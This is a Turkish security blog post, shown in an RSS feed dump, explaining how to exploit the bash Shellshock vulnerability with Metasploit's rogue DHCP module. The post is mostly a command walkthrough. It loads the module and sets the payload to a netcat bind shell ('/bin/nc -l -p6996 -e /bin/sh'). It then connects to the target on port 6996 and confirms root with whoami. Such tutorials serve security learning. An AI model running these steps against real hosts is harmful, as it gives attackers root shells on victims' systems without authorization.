zafiyet arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Thu, 19 Apr 2018 19:50:27 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png zafiyet arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma https://canyoupwn.me/tr-how-to-hack-the-shellshock-vulnerability/ https://canyoupwn.me/tr-how-to-hack-the-shellshock-vulnerability/#respond Thu, 04 Feb 2016 00:20:31 +0000 http://canyoupwn.me/?p=249 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shellshock Nedir? Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır. Nasıl Kullanılır? Metasploit Framework ü çalıştıyoruz; msfconsole Exploit i arıyoruz; search shellshock Exploit i yüklüyoruz. use auxiliary/server/dhclient/dhclient_bash_env Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek; info Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek; show options DHPC sunucu ip adresini değişmek için; […]

TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma Mustafa Kaan Demirhan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shellshock Nedir?

Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır.

Nasıl Kullanılır?

  • Metasploit Framework ü çalıştıyoruz;
msfconsole
  • Exploit i arıyoruz;
search shellshock
  • Exploit i yüklüyoruz.
use auxiliary/server/dhclient/dhclient_bash_env
  • Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek;
info
  • Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek;
show options
  • DHPC sunucu ip adresini değişmek için;
set SVRHOST 192.168.131.61
  • CMD parametresini düzenlemek için;
set CMD /bin/nc -l -p6996 -e /bin/sh
  • Son parametremiz NETMASK için;
set NETMASK 255.255.255.0
  • Exploiti çalıştrmak için;
exploit
  • Çalıştırdıktan sonra durumu özet geçmek gerekirse hedefin CMD satırında Shellshock zafiyeti sayesinde root yetkisiyle “6996” nolu portla netcat yardımıyla bağlantı kurabiliriz. Exploitli sisteme bağlanmak için;
c::\nc 192.168.131.61 6996
  • Exploited Linux sistemin ayarlarına döndürmek için;
ifconfig

yapmamız yeterlidir.

  • Sistemdeki yetkimizi check etmek için;
whoami

yapıp root olup olmadığımızı doğrulayabiliriz.

TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma Mustafa Kaan Demirhan

]]>
https://canyoupwn.me/tr-how-to-hack-the-shellshock-vulnerability/feed/ 0